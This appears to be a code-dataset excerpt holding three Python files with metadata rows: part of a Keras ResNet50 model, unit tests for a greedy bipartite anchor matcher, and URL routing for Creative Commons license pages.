kernel_regularizer=_gen_l2_regularizer(use_l2_regularizer),
name=conv_name_base + '2c')(
x)
x = layers.BatchNormalization(
axis=bn_axis,
momentum=BATCH_NORM_DECAY,
epsilon=BATCH_NORM_EPSILON,
name=bn_name_base + '2c')(
x)
x = layers.add([x, input_tensor])
x = layers.Activation('relu')(x)
return x
def conv_block(input_tensor,
kernel_size,
filters,
stage,
block,
strides=(2, 2),
use_l2_regularizer=True):
"""A block that has a conv layer at shortcut.
Note that from stage 3,
the second conv layer at main path is with strides=(2, 2)
And the shortcut should have strides=(2, 2) as well
Args:
input_tensor: input tensor
kernel_size: default 3, the kernel size of middle conv layer at main path
filters: list of integers, the filters of 3 conv layer at main path
stage: integer, current stage label, used for generating layer names
block: 'a','b'..., current block label, used for generating layer names
strides: Strides for the second conv layer in the block.
use_l2_regularizer: whether to use L2 regularizer on Conv layer.
Returns:
Output tensor for the block.
"""
filters1, filters2, filters3 = filters
if backend.image_data_format() == 'channels_last':
bn_axis = 3
else:
bn_axis = 1
conv_name_base = 'res' + str(stage) + block + '_branch'
bn_name_base = 'bn' + str(stage) + block + '_branch'
x = layers.Conv2D(
filters1, (1, 1),
use_bias=False,
kernel_initializer='he_normal',
kernel_regularizer=_gen_l2_regularizer(use_l2_regularizer),
name=conv_name_base + '2a')(
input_tensor)
x = layers.BatchNormalization(
axis=bn_axis,
momentum=BATCH_NORM_DECAY,
epsilon=BATCH_NORM_EPSILON,
name=bn_name_base + '2a')(
x)
x = layers.Activation('relu')(x)
x = layers.Conv2D(
filters2,
kernel_size,
strides=strides,
padding='same',
use_bias=False,
kernel_initializer='he_normal',
kernel_regularizer=_gen_l2_regularizer(use_l2_regularizer),
name=conv_name_base + '2b')(
x)
x = layers.BatchNormalization(
axis=bn_axis,
momentum=BATCH_NORM_DECAY,
epsilon=BATCH_NORM_EPSILON,
name=bn_name_base + '2b')(
x)
x = layers.Activation('relu')(x)
x = layers.Conv2D(
filters3, (1, 1),
use_bias=False,
kernel_initializer='he_normal',
kernel_regularizer=_gen_l2_regularizer(use_l2_regularizer),
name=conv_name_base + '2c')(
x)
x = layers.BatchNormalization(
axis=bn_axis,
momentum=BATCH_NORM_DECAY,
epsilon=BATCH_NORM_EPSILON,
name=bn_name_base + '2c')(
x)
shortcut = layers.Conv2D(
filters3, (1, 1),
strides=strides,
use_bias=False,
kernel_initializer='he_normal',
kernel_regularizer=_gen_l2_regularizer(use_l2_regularizer),
name=conv_name_base + '1')(
input_tensor)
shortcut = layers.BatchNormalization(
axis=bn_axis,
momentum=BATCH_NORM_DECAY,
epsilon=BATCH_NORM_EPSILON,
name=bn_name_base + '1')(
shortcut)
x = layers.add([x, shortcut])
x = layers.Activation('relu')(x)
return x
def resnet50(num_classes,
batch_size=None,
use_l2_regularizer=True,
rescale_inputs=False):
"""Instantiates the ResNet50 architecture.
Args:
num_classes: `int` number of classes for image classification.
batch_size: Size of the batches for each step.
use_l2_regularizer: whether to use L2 regularizer on Conv/Dense layer.
rescale_inputs: whether to rescale inputs from 0 to 1.
Returns:
A Keras model instance.
"""
input_shape = (224, 224, 3)
img_input = layers.Input(shape=input_shape, batch_size=batch_size)
if rescale_inputs:
# Hub image modules expect inputs in the range [0, 1]. This rescales these
# inputs to the range expected by the trained model.
x = layers.Lambda(
lambda x: x * 255.0 - backend.constant(
image_processing.CHANNEL_MEANS,
shape=[1, 1, 3],
dtype=x.dtype),
name='rescale')(
img_input)
else:
x = img_input
if backend.image_data_format() == 'channels_first':
x = layers.Lambda(
lambda x: backend.permute_dimensions(x, (0, 3, 1, 2)),
name='transpose')(x)
bn_axis = 1
else: # channels_last
bn_axis = 3
x = layers.ZeroPadding2D(padding=(3, 3), name='conv1_pad')(x)
x = layers.Conv2D(
64, (7, 7),
strides=(2, 2),
padding='valid',
use_bias=False,
kernel_initializer='he_normal',
kernel_regularizer=_gen_l2_regularizer(use_l2_regularizer),
name='conv1')(
x)
x = layers.BatchNormalization(
axis=bn_axis,
momentum=BATCH_NORM_DECAY,
epsilon=BATCH_NORM_EPSILON,
name='bn_conv1')(
x)
x = layers.Activation('relu')(x)
x = layers.MaxPooling2D((3, 3), strides=(2, 2), padding='same')(x)
x = conv_block(
x,
3, [64, 64, 256],
stage=2,
block='a',
strides=(1, 1),
use_l2_regularizer=use_l2_regularizer)
x = identity_block(
x,
3, [64, 64, 256],
stage=2,
block='b',
use_l2_regularizer=use_l2_regularizer)
x = identity_block(
x,
3, [64, 64, 256],
stage=2,
block='c',
use_l2_regularizer=use_l2_regularizer)
x = conv_block(
x,
3, [128, 128, 512],
stage=3,
block='a',
use_l2_regularizer=use_l2_regularizer)
x = identity_block(
x,
3, [128, 128, 512],
stage=3,
block='b',
use_l2_regularizer=use_l2_regularizer)
x = identity_block(
x,
3, [128, 128, 512],
stage=3,
block='c',
use_l2_regularizer=use_l2_regularizer)
x = identity_block(
x,
3, [128, 128, 512],
stage=3,
block='d',
use_l2_regularizer=use_l2_regularizer)
x = conv_block(
x,
3, [256, 256, 1024],
stage=4,
block='a',
use_l2_regularizer=use_l2_regularizer)
x = identity_block(
x,
3, [256, 256, 1024],
stage=4,
block='b',
use_l2_regularizer=use_l2_regularizer)
x = identity_block(
x,
3, [256, 256, 1024],
stage=4,
block='c',
use_l2_regularizer=use_l2_regularizer)
x = identity_block(
x,
3, [256, 256, 1024],
stage=4,
block='d',
use_l2_regularizer=use_l2_regularizer)
x = identity_block(
x,
3, [256, 256, 1024],
stage=4,
block='e',
use_l2_regularizer=use_l2_regularizer)
x = identity_block(
x,
3, [256, 256, 1024],
stage=4,
block='f',
use_l2_regularizer=use_l2_regularizer)
x = conv_block(
x,
3, [512, 512, 2048],
stage=5,
block='a',
use_l2_regularizer=use_l2_regularizer)
x = identity_block(
x,
3, [512, 512, 2048],
stage=5,
block='b',
use_l2_regularizer=use_l2_regularizer)
x = identity_block(
x,
3, [512, 512, 2048],
stage=5,
block='c',
use_l2_regularizer=use_l2_regularizer)
rm_axes = [1, 2] if backend.image_data_format() == 'channels_last' else [2, 3]
x = layers.Lambda(lambda x: backend.mean(x, rm_axes), name='reduce_mean')(x)
x = layers.Dense(
num_classes,
kernel_initializer=initializers.RandomNormal(stddev=0.01),
kernel_regularizer=_gen_l2_regularizer(use_l2_regularizer),
bias_regularizer=_gen_l2_regularizer(use_l2_regularizer),
name='fc1000')(
x)
# A softmax that is followed by the model loss must be done cannot be done
# in float16 due to numeric issues. So we pass dtype=float32.
x = layers.Activation('softmax', dtype='float32')(x)
# Create model.
return models.Model(img_input, x, name='resnet50')
def trivial(num_classes,
batch_size=None,
use_l2_regularizer=True):
input_shape = (224, 224, 3)
img_input = layers.Input(shape=input_shape, batch_size=batch_size)
x = img_input
if backend.image_data_format() == 'channels_first':
x = layers.Lambda(
lambda x: backend.permute_dimensions(x, (0, 3, 1, 2)),
name='transpose')(x)
bn_axis = 1
else: # channels_last
bn_axis = 3
x = layers.ZeroPadding2D(padding=(3, 3), name='conv1_pad')(x)
x = layers.Conv2D(
64, (7, 7),
strides=(2, 2),
padding='valid',
use_bias=False,
kernel_initializer='he_normal',
kernel_regularizer=_gen_l2_regularizer(use_l2_regularizer),
name='conv1')(
x)
x = layers.BatchNormalization(
axis=bn_axis,
momentum=BATCH_NORM_DECAY,
epsilon=BATCH_NORM_EPSILON,
name='bn_conv1')(
x)
rm_axes = [1, 2] if backend.image_data_format() == 'channels_last' else [2, 3]
x = layers.Lambda(lambda x: backend.mean(x, rm_axes), name='reduce_mean')(x)
x = layers.Dense(
num_classes,
kernel_initializer=initializers.RandomNormal(stddev=0.01),
kernel_regularizer=_gen_l2_regularizer(use_l2_regularizer),
bias_regularizer=_gen_l2_regularizer(use_l2_regularizer),
name='fc1000')(
x)
# A softmax that is followed by the model loss must be done cannot be done
# in float16 due to numeric issues. So we pass dtype=float32.
x = layers.Activation('softmax', dtype='float32')(x)
# Create model.
return models.Model(img_input, x, name='resnet50')
| 28.783654 | 80 | 0.636045 | 1,604 | 11,974 | 4.507481 | 0.122195 | 0.127663 | 0.126141 | 0.074689 | 0.835546 | 0.826418 | 0.821024 | 0.821024 | 0.791701 | 0.769433 | 0 | 0.048277 | 0.256138 | 11,974 | 415 | 81 | 28.853012 | 0.763444 | 0.162268 | 0 | 0.892537 | 0 | 0 | 0.044073 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.014925 | false | 0 | 0.01791 | 0.002985 | 0.047761 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
413d7681258d94e5b3a839238c2933656744d427 | 11,468 | py | Python | tests/kerascv/layers/matchers/greedy_bipartite_test.py | tanzhenyu/keras-cv | b7208ee25735c492ccc171874e34076111dcf637 | [
"Apache-2.0"
] | null | null | null | tests/kerascv/layers/matchers/greedy_bipartite_test.py | tanzhenyu/keras-cv | b7208ee25735c492ccc171874e34076111dcf637 | [
"Apache-2.0"
] | null | null | null | tests/kerascv/layers/matchers/greedy_bipartite_test.py | tanzhenyu/keras-cv | b7208ee25735c492ccc171874e34076111dcf637 | [
"Apache-2.0"
] | null | null | null | import numpy as np
import tensorflow as tf
from kerascv.layers.anchor_generators.anchor_generator import AnchorGenerator
from kerascv.layers.matchers.greedy_bipartite import target_assign_func
from kerascv.layers.matchers.greedy_bipartite import target_assign_tf_func
def test_single_gt_best_match():
anchor_gen = AnchorGenerator(
image_size=(300, 300),
scales=[0.2],
aspect_ratios=[1.0],
clip_boxes=False,
normalize_coordinates=True,
)
anchors = anchor_gen((2, 2))
ground_truth_boxes = tf.constant([[0.14, 0.64, 0.34, 0.84]])
ground_truth_labels = tf.constant([[8]])
matched_gt_boxes, matched_gt_labels, positive_mask, negative_mask = target_assign_func(
ground_truth_boxes, ground_truth_labels, anchors
)
expected_matched_gt_boxes = np.asarray(
[anchors[0, :], ground_truth_boxes[0, :], anchors[2, :], anchors[3, :]]
)
np.testing.assert_allclose(expected_matched_gt_boxes, matched_gt_boxes)
expected_matched_gt_labels = np.zeros((4, 1))
expected_matched_gt_labels[1] = ground_truth_labels[0]
np.testing.assert_allclose(expected_matched_gt_labels, matched_gt_labels)
expected_positive_mask = np.asarray([0, 1, 0, 0]).astype(np.int)
expected_negative_mask = np.asarray([1, 0, 1, 1]).astype(np.int)
np.testing.assert_equal(expected_positive_mask, positive_mask)
np.testing.assert_equal(expected_negative_mask, negative_mask)
def test_single_gt_no_intersect():
anchor_gen = AnchorGenerator(
image_size=(300, 300),
scales=[0.2],
aspect_ratios=[1.0],
clip_boxes=False,
normalize_coordinates=True,
)
anchors = anchor_gen((2, 2))
ground_truth_boxes = tf.constant([[0.4, 0.65, 0.6, 0.85]])
ground_truth_labels = tf.constant([[8]])
# Since it does not intersect with any anchor, it will be matched with the first gt.
matched_gt_boxes, matched_gt_labels, positive_mask, negative_mask = target_assign_func(
ground_truth_boxes, ground_truth_labels, anchors
)
expected_matched_gt_boxes = np.asarray(
[ground_truth_boxes[0, :], anchors[1, :], anchors[2, :], anchors[3, :]]
)
np.testing.assert_allclose(expected_matched_gt_boxes, matched_gt_boxes)
expected_matched_gt_labels = np.zeros((4, 1))
expected_matched_gt_labels[0] = ground_truth_labels[0]
np.testing.assert_allclose(expected_matched_gt_labels, matched_gt_labels)
expected_positive_mask = np.asarray([1, 0, 0, 0]).astype(np.int)
expected_negative_mask = np.asarray([0, 1, 1, 1]).astype(np.int)
np.testing.assert_equal(expected_positive_mask, positive_mask)
np.testing.assert_equal(expected_negative_mask, negative_mask)
def test_single_gt_single_match_single_neutral():
anchor_gen = AnchorGenerator(
image_size=(300, 300),
scales=[0.5],
aspect_ratios=[1.0],
clip_boxes=False,
normalize_coordinates=True,
)
anchors = anchor_gen((2, 2))
ground_truth_boxes = tf.constant([[0.24, 0.5, 0.74, 1.0]])
ground_truth_labels = tf.constant([[8]])
matched_gt_boxes, matched_gt_labels, positive_mask, negative_mask = target_assign_func(
ground_truth_boxes, ground_truth_labels, anchors
)
expected_matched_gt_boxes = np.asarray(
[anchors[0, :], ground_truth_boxes[0, :], anchors[2, :], anchors[3, :]]
)
np.testing.assert_allclose(expected_matched_gt_boxes, matched_gt_boxes)
expected_matched_gt_labels = np.zeros((4, 1))
expected_matched_gt_labels[1] = ground_truth_labels[0]
np.testing.assert_allclose(expected_matched_gt_labels, matched_gt_labels)
expected_positive_mask = np.asarray([0, 1, 0, 0]).astype(np.int)
expected_negative_mask = np.asarray([1, 0, 1, 0]).astype(np.int)
np.testing.assert_equal(expected_positive_mask, positive_mask)
np.testing.assert_equal(expected_negative_mask, negative_mask)
def test_single_gt_single_match_zero_neutral():
anchor_gen = AnchorGenerator(
image_size=(300, 300),
scales=[0.5],
aspect_ratios=[1.0],
clip_boxes=False,
normalize_coordinates=True,
)
anchors = anchor_gen((2, 2))
ground_truth_boxes = tf.constant([[0.24, 0.5, 0.74, 1.0]])
ground_truth_labels = tf.constant([[8]])
matched_gt_boxes, matched_gt_labels, positive_mask, negative_mask = target_assign_func(
ground_truth_boxes, ground_truth_labels, anchors, negative_iou_threshold=1 / 3
)
expected_matched_gt_boxes = np.asarray(
[anchors[0, :], ground_truth_boxes[0, :], anchors[2, :], anchors[3, :]]
)
np.testing.assert_allclose(expected_matched_gt_boxes, matched_gt_boxes)
expected_matched_gt_labels = np.zeros((4, 1))
expected_matched_gt_labels[1] = ground_truth_labels[0]
np.testing.assert_allclose(expected_matched_gt_labels, matched_gt_labels)
expected_positive_mask = np.asarray([0, 1, 0, 0]).astype(np.int)
expected_negative_mask = np.asarray([1, 0, 1, 1]).astype(np.int)
np.testing.assert_equal(expected_positive_mask, positive_mask)
np.testing.assert_equal(expected_negative_mask, negative_mask)
def test_single_gt_four_match():
anchor_gen = AnchorGenerator(
image_size=(300, 300),
scales=[0.5],
aspect_ratios=[1.0],
clip_boxes=False,
normalize_coordinates=True,
)
anchors = anchor_gen((2, 2))
ground_truth_boxes = tf.constant([[0.25, 0.25, 0.75, 0.75]])
ground_truth_labels = tf.constant([[8]])
matched_gt_boxes, matched_gt_labels, positive_mask, negative_mask = target_assign_func(
ground_truth_boxes,
ground_truth_labels,
anchors,
positive_iou_threshold=1 / 7,
negative_iou_threshold=1 / 8,
)
expected_matched_gt_boxes = np.tile(ground_truth_boxes, (4, 1))
np.testing.assert_allclose(expected_matched_gt_boxes, matched_gt_boxes)
expected_matched_gt_labels = np.tile(ground_truth_labels, (4, 1))
np.testing.assert_allclose(expected_matched_gt_labels, matched_gt_labels)
expected_positive_mask = np.asarray([1, 1, 1, 1]).astype(np.int)
expected_negative_mask = np.asarray([0, 0, 0, 0]).astype(np.int)
np.testing.assert_equal(expected_positive_mask, positive_mask)
np.testing.assert_equal(expected_negative_mask, negative_mask)
def test_single_gt_single_match_three_negative():
anchor_gen = AnchorGenerator(
image_size=(300, 300),
scales=[0.5],
aspect_ratios=[1.0],
clip_boxes=False,
normalize_coordinates=True,
)
anchors = anchor_gen((2, 2))
ground_truth_boxes = tf.constant([[0.25, 0.25, 0.75, 0.75]])
ground_truth_labels = tf.constant([[8]])
matched_gt_boxes, matched_gt_labels, positive_mask, negative_mask = target_assign_func(
ground_truth_boxes, ground_truth_labels, anchors
)
expected_matched_gt_boxes = np.asarray(
[ground_truth_boxes[0, :], anchors[1, :], anchors[2, :], anchors[3, :]]
)
np.testing.assert_allclose(expected_matched_gt_boxes, matched_gt_boxes)
expected_matched_gt_labels = np.zeros((4, 1))
expected_matched_gt_labels[0] = ground_truth_labels[0]
np.testing.assert_allclose(expected_matched_gt_labels, matched_gt_labels)
expected_positive_mask = np.asarray([1, 0, 0, 0]).astype(np.int)
expected_negative_mask = np.asarray([0, 1, 1, 1]).astype(np.int)
np.testing.assert_equal(expected_positive_mask, positive_mask)
np.testing.assert_equal(expected_negative_mask, negative_mask)
def test_single_gt_single_match_three_neutral():
anchor_gen = AnchorGenerator(
image_size=(300, 300),
scales=[0.5],
aspect_ratios=[1.0],
clip_boxes=False,
normalize_coordinates=True,
)
anchors = anchor_gen((2, 2))
ground_truth_boxes = tf.constant([[0.25, 0.25, 0.75, 0.75]])
ground_truth_labels = tf.constant([[8]])
matched_gt_boxes, matched_gt_labels, positive_mask, negative_mask = target_assign_func(
ground_truth_boxes, ground_truth_labels, anchors, negative_iou_threshold=1 / 7
)
expected_matched_gt_boxes = np.asarray(
[ground_truth_boxes[0, :], anchors[1, :], anchors[2, :], anchors[3, :]]
)
np.testing.assert_allclose(expected_matched_gt_boxes, matched_gt_boxes)
expected_matched_gt_labels = np.zeros((4, 1))
expected_matched_gt_labels[0] = ground_truth_labels[0]
np.testing.assert_allclose(expected_matched_gt_labels, matched_gt_labels)
expected_positive_mask = np.asarray([1, 0, 0, 0]).astype(np.int)
expected_negative_mask = np.asarray([0, 0, 0, 0]).astype(np.int)
np.testing.assert_equal(expected_positive_mask, positive_mask)
np.testing.assert_equal(expected_negative_mask, negative_mask)
def test_two_gt_two_matches():
anchor_gen = AnchorGenerator(
image_size=(300, 300),
scales=[0.2],
aspect_ratios=[1.0],
clip_boxes=False,
normalize_coordinates=True,
)
anchors = anchor_gen((2, 2))
# The first box will be matched to the second anchor
# The second box will be matched to the first anchor
ground_truth_boxes = tf.constant([
[0.15, 0.65, 0.35, 0.85],
[0.14, 0.64, 0.34, 0.84],
])
ground_truth_labels = tf.constant([[8], [6]])
matched_gt_boxes, matched_gt_labels, positive_mask, negative_mask = target_assign_func(
ground_truth_boxes, ground_truth_labels, anchors
)
expected_matched_gt_boxes = np.asarray(
[ground_truth_boxes[1, :], ground_truth_boxes[0, :], anchors[2, :], anchors[3, :]]
)
np.testing.assert_allclose(expected_matched_gt_boxes, matched_gt_boxes)
expected_matched_gt_labels = np.zeros((4, 1))
expected_matched_gt_labels[1] = ground_truth_labels[0]
expected_matched_gt_labels[0] = ground_truth_labels[1]
np.testing.assert_allclose(expected_matched_gt_labels, matched_gt_labels)
expected_positive_mask = np.asarray([1, 1, 0, 0]).astype(np.int)
expected_negative_mask = np.asarray([0, 0, 1, 1]).astype(np.int)
np.testing.assert_equal(expected_positive_mask, positive_mask)
np.testing.assert_equal(expected_negative_mask, negative_mask)
def test_tf_single_gt_single_match_three_neutral():
anchor_gen = AnchorGenerator(
image_size=(300, 300),
scales=[0.5],
aspect_ratios=[1.0],
clip_boxes=False,
normalize_coordinates=True,
)
anchors = anchor_gen((2, 2))
ground_truth_boxes = tf.constant([[0.25, 0.25, 0.75, 0.75]])
ground_truth_labels = tf.constant([[8]], dtype=tf.int64)
matched_gt_boxes, matched_gt_labels, positive_mask, negative_mask = target_assign_tf_func(
ground_truth_boxes,
ground_truth_labels,
anchors,
negative_iou_threshold=tf.constant(1 / 7, dtype=tf.float32),
)
expected_matched_gt_boxes = np.asarray(
[ground_truth_boxes[0, :], anchors[1, :], anchors[2, :], anchors[3, :]]
)
np.testing.assert_allclose(expected_matched_gt_boxes, matched_gt_boxes)
expected_matched_gt_labels = np.zeros((4, 1))
expected_matched_gt_labels[0] = ground_truth_labels[0]
np.testing.assert_allclose(expected_matched_gt_labels, matched_gt_labels)
expected_positive_mask = np.asarray([1, 0, 0, 0]).astype(np.int)
expected_negative_mask = np.asarray([0, 0, 0, 0]).astype(np.int)
np.testing.assert_equal(expected_positive_mask, positive_mask)
np.testing.assert_equal(expected_negative_mask, negative_mask)
| 44.107692 | 94 | 0.712592 | 1,631 | 11,468 | 4.641324 | 0.063765 | 0.096301 | 0.089168 | 0.082034 | 0.942272 | 0.939102 | 0.926024 | 0.926024 | 0.920608 | 0.904888 | 0 | 0.040778 | 0.1703 | 11,468 | 259 | 95 | 44.277992 | 0.754808 | 0.016045 | 0 | 0.739496 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.151261 | 1 | 0.037815 | false | 0 | 0.021008 | 0 | 0.058824 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
417c3118f68a0854a65df1aa56abdef2f232b670 | 8,736 | py | Python | cc/engine/licenses/routing.py | Abbas-000/cc.engine | eb4b5e5f6c695a16c7ab8bcc52036cf16a0fba22 | [
"MIT"
] | 6 | 2017-12-25T08:18:43.000Z | 2021-01-02T09:02:59.000Z | cc/engine/licenses/routing.py | Abbas-000/cc.engine | eb4b5e5f6c695a16c7ab8bcc52036cf16a0fba22 | [
"MIT"
] | 39 | 2017-11-17T01:59:38.000Z | 2021-12-14T19:14:12.000Z | cc/engine/licenses/routing.py | Abbas-000/cc.engine | eb4b5e5f6c695a16c7ab8bcc52036cf16a0fba22 | [
"MIT"
] | 17 | 2017-12-25T08:18:13.000Z | 2021-04-12T12:50:35.000Z | from routes.route import Route
licenses_routes = [
Route("licenses_index", "/",
controller="cc.engine.licenses.views:licenses_view"),
# MIT / BSD routing
Route("license_deed_mit", "/MIT/",
redirect_to="http://opensource.org/licenses/mit-license.php",
controller="cc.engine.licenses.views:moved_permanently_redirect"),
Route("license_deed_bsd", "/BSD/",
redirect_to="http://opensource.org/licenses/bsd-license.php",
controller="cc.engine.licenses.views:moved_permanently_redirect"),
Route("license_deed_explicit_mit", "/MIT/deed",
redirect_to="http://opensource.org/licenses/mit-license.php",
controller="cc.engine.licenses.views:moved_permanently_redirect"),
Route("license_deed_lang_mit", "/MIT/deed.{target_lang:[a-zA-Z_-]+}",
redirect_to="http://opensource.org/licenses/mit-license.php",
controller="cc.engine.licenses.views:moved_permanently_redirect"),
Route("license_deed_explicit_bsd", "/BSD/deed",
redirect_to="http://opensource.org/licenses/bsd-license.php",
controller="cc.engine.licenses.views:moved_permanently_redirect"),
Route("license_deed_lang_bsd", "/BSD/deed.{target_lang:[a-zA-Z_-]+}",
redirect_to="http://opensource.org/licenses/bsd-license.php",
controller="cc.engine.licenses.views:moved_permanently_redirect"),
Route("license_legalcode_mit_redirect", "/MIT/legalcode",
redirect_to="http://opensource.org/licenses/mit-license.php",
controller="cc.engine.licenses.views:moved_permanently_redirect"),
Route("license_legalcode_bsd_redirect", "/BSD/legalcode",
redirect_to="http://opensource.org/licenses/bsd-license.php",
controller="cc.engine.licenses.views:moved_permanently_redirect"),
Route("license_rdf_mit", "/MIT/rdf",
controller="cc.engine.licenses.views:license_rdf_view",
code="MIT"),
Route("license_rdf_bsd", "/BSD/rdf",
controller="cc.engine.licenses.views:license_rdf_view",
code="BSD"),
# publicdomain routing
Route("license_deed_publicdomain", "/publicdomain/",
controller="cc.engine.licenses.views:license_deed_view",
code="publicdomain"),
Route("license_rdf_publicdomain", "/publicdomain/rdf",
controller="cc.engine.licenses.views:license_rdf_view",
code="publicdomain"),
Route("license_deed_explicit_publicdomain",
"/publicdomain/deed", code="publicdomain",
controller="cc.engine.licenses.views:license_deed_view"),
Route("license_deed_lang_publicdomain",
"/publicdomain/deed.{target_lang:[a-zA-Z_-]+}", code="publicdomain",
controller="cc.engine.licenses.views:license_deed_view"),
# GPL redirects and etc
Route("license_deed_gpl", "/GPL/2.0/",
redirect_to="http://www.gnu.org/licenses/gpl-2.0.html",
controller="cc.engine.licenses.views:moved_permanently_redirect"),
Route("license_deed_explicit_gpl", "/GPL/2.0/deed",
redirect_to="http://www.gnu.org/licenses/gpl-2.0.html",
controller="cc.engine.licenses.views:moved_permanently_redirect"),
Route("license_deed_lang_gpl", "/GPL/2.0/deed.{target_lang:[a-zA-Z_-]+}",
redirect_to="http://www.gnu.org/licenses/gpl-2.0.html",
controller="cc.engine.licenses.views:moved_permanently_redirect"),
Route("license_rdf_gpl", "/GPL/2.0/rdf",
redirect_to="http://www.gnu.org/licenses/gpl-2.0.rdf",
controller="cc.engine.licenses.views:moved_permanently_redirect"),
Route("license_deed_lgpl", "/LGPL/2.1/",
redirect_to="http://www.gnu.org/licenses/lgpl-2.1.html",
controller="cc.engine.licenses.views:moved_permanently_redirect"),
Route("license_deed_explicit_lgpl", "/LGPL/2.1/deed",
redirect_to="http://www.gnu.org/licenses/lgpl-2.1.html",
controller="cc.engine.licenses.views:moved_permanently_redirect"),
Route("license_deed_lang_lgpl", "/LGPL/2.1/deed.{target_lang:[a-zA-Z_-]+}",
redirect_to="http://www.gnu.org/licenses/lgpl-2.1.html",
controller="cc.engine.licenses.views:moved_permanently_redirect"),
Route("license_rdf_lgpl", "/LGPL/2.1/rdf",
redirect_to="http://www.gnu.org/licenses/lgpl-2.1.rdf",
controller="cc.engine.licenses.views:moved_permanently_redirect"),
# Normal license routing
Route("license_deed",
"/{code:[-a-z+]+}/{version:[0-9.]+}/",
controller="cc.engine.licenses.views:license_deed_view"),
Route("license_deed_explicit",
"/{code:[-a-z+]+}/{version:[0-9.]+}/deed",
controller="cc.engine.licenses.views:license_deed_view"),
Route("license_deed_lang",
"/{code:[-a-z+]+}/{version:[0-9.]+}/deed.{target_lang:[a-zA-Z_-]+}",
controller="cc.engine.licenses.views:license_deed_view"),
Route("license_rdf",
"/{code:[-a-z+]+}/{version:[0-9.]+}/rdf",
controller="cc.engine.licenses.views:license_rdf_view"),
Route("license_legalcode",
"/{code:[-a-z+]+}/{version:[0-9.]+}/legalcode",
controller="cc.engine.licenses.views:license_legalcode_view"),
Route("license_legalcode_plain",
"/{code:[-a-z+]+}/{version:[0-9.]+}/legalcode-plain",
controller="cc.engine.licenses.views:license_legalcode_plain_view"),
Route("license_deed_jurisdiction",
"/{code:[-a-z+]+}/{version:[0-9.]+}/{jurisdiction:[a-zA-Z_-]+}/",
controller="cc.engine.licenses.views:license_deed_view"),
Route("license_deed_jurisdiction_explicit",
"/{code:[-a-z+]+}/{version:[0-9.]+}/{jurisdiction:[a-zA-Z_-]+}/deed",
controller="cc.engine.licenses.views:license_deed_view"),
Route("license_deed_lang_jurisdiction",
"/{code:[-a-z+]+}/{version:[0-9.]+}/{jurisdiction:[a-zA-Z_-]+}/deed.{target_lang:[a-zA-Z_-]+}",
controller="cc.engine.licenses.views:license_deed_view"),
Route("license_rdf_jurisdiction",
"/{code:[-a-z+]+}/{version:[0-9.]+}/{jurisdiction:[a-zA-Z_-]+}/rdf",
controller="cc.engine.licenses.views:license_rdf_view"),
Route("license_legalcode_jurisdiction",
"/{code:[-a-z+]+}/{version:[0-9.]+}/{jurisdiction:[a-zA-Z_-]+}/legalcode",
controller="cc.engine.licenses.views:license_legalcode_view"),
Route("license_legalcode_plain_jurisdiction",
"/{code:[-a-z+]+}/{version:[0-9.]+}/{jurisdiction:[a-zA-Z_-]+}/legalcode-plain",
controller="cc.engine.licenses.views:license_legalcode_plain_view"),
Route("license_standard_catcher",
"/{code:[-a-z+]+}/",
controller="cc.engine.licenses.views:license_catcher"),
]
cc0_routes = [
Route("cc0_catcher", "/", code='CC0',
controller="cc.engine.licenses.views:license_catcher"),
Route("cc0_deed", "/{version:[0-9.]+}/",
code='CC0', controller="cc.engine.licenses.views:license_deed_view"),
Route("cc0_deed_explicit", "/{version:[0-9.]+}/deed",
code='CC0', controller="cc.engine.licenses.views:license_deed_view"),
Route("cc0_deed_lang", "/{version:[0-9.]+}/deed.{target_lang:[a-zA-Z_-]+}",
code='CC0', controller="cc.engine.licenses.views:license_deed_view"),
Route("cc0_rdf", "/{version:[0-9.]+}/rdf",
code='CC0', controller="cc.engine.licenses.views:license_rdf_view"),
Route("cc0_legalcode", "/{version:[0-9.]+}/legalcode", code='CC0',
controller="cc.engine.licenses.views:license_legalcode_view"),
Route("cc0_legalcode_plain", "/{version:[0-9.]+}/legalcode-plain", code='CC0',
controller="cc.engine.licenses.views:license_legalcode_plain_view")]
mark_routes = [
Route("mark_catcher", "/", code='mark',
controller="cc.engine.licenses.views:license_catcher"),
Route("mark_deed", "/{version:[0-9.]+}/",
code='mark', controller="cc.engine.licenses.views:license_deed_view"),
Route("mark_deed_explicit", "/{version:[0-9.]+}/deed",
code='mark', controller="cc.engine.licenses.views:license_deed_view"),
Route("mark_deed_lang", "/{version:[0-9.]+}/deed.{target_lang:[a-zA-Z_-]+}",
code='mark', controller="cc.engine.licenses.views:license_deed_view"),
Route("mark_rdf", "/{version:[0-9.]+}/rdf",
code='mark', controller="cc.engine.licenses.views:license_rdf_view"),
Route("mark_legalcode", "/{version:[0-9.]+}/legalcode", code='mark',
controller="cc.engine.licenses.views:license_legalcode_view"),
Route("mark_legalcode_plain",
"/{version:[0-9.]+}/legalcode-plain", code='mark',
controller="cc.engine.licenses.views:license_legalcode_plain_view")]
| 54.943396 | 105 | 0.656479 | 1,085 | 8,736 | 5.058986 | 0.04977 | 0.10931 | 0.163964 | 0.236837 | 0.903261 | 0.87393 | 0.853161 | 0.816907 | 0.777191 | 0.689379 | 0 | 0.012796 | 0.150183 | 8,736 | 158 | 106 | 55.291139 | 0.726563 | 0.009501 | 0 | 0.439716 | 0 | 0.049645 | 0.639413 | 0.474847 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.007092 | 0 | 0.007092 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 9 |
